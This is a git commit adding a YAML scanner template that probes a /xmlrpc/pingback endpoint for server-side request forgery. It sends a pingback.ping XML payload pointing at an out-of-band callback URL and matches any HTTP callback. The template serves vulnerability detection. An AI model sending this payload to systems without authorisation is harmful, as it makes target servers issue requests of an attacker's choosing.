Create xmlrpc-pingback-ssrf.yaml
parent
f60cef447b
commit
067c9a8755
|
@ -0,0 +1,36 @@
|
|||
id: xmlrpc-pingback-ssrf
|
||||
|
||||
info:
|
||||
name: XMLRPC Pingback SSRF
|
||||
author: geeknik
|
||||
reference: https://hackerone.com/reports/406387
|
||||
severity: high
|
||||
tags: ssrf,generic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /xmlrpc/pingback HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 305
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<methodCall>
|
||||
<methodName>pingback.ping</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>http://{{interactsh-url}}</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh-protocol
|
||||
words:
|
||||
- "http"
|
Loading…
Reference in New Issue